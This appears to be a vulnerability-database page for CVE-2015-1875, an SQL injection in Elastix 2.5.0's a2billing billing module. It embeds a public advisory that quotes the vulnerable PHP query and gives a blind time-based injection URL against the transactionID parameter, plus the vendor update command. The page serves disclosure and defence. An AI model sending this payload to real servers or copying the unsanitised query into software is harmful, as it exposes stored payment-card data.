CVE-2015-1875

high

Published 2015-03-11 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

SQL injection vulnerability in a2billing/customer/iridium_threed.php in Elastix 2.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the transactionID parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-36305 webapps php text · 2 KB

Ahmed Aboul-Ela · 2015-03-07

Elastix 2.x - Blind SQL Injection

text exploit Source: Exploit-DB

# Title: Elastix v2.x Blind SQL Injection Vulnerability
# Author: Ahmed Aboul-Ela
# Twitter: https://twitter.com/aboul3la
# Vendor : http://www.elastix.org
# Version: v2.5.0 and prior versions should be affected too
 
- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
 
  <?php
  [...]
  line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig', 
  'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));

  line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, 
  creationdate, status, cvv, credit_card_type,currency, item_id, item_type " . 
  " FROM cc_epayment_log " . " WHERE id = ".$transactionID;

  line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
  [...]
  ?>    
  
   The GET parameter transactionID was used directly in the SQL query 
   without any sanitization which lead directly to SQL Injection vulnerability.
 
- Proof of Concept: 
 
  http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
  
  The backend response will delay for few seconds, which means the benchmark() function was executed successfully
 
- Mitigation:
   
   The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
   
   [~] yum update elastix-a2billing
 
 
- Time-Line:
 
    Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
    Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
    Fri, Mar  6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
    Sat, Mar  7, 2015 at 5:15 PM: The public responsible disclosure

- Credits:
 
    Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT

Application impact

Vendor	Product	Versions	Fixed
palosanto	elastix	`{"endIncluding":"2.5.0"}`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.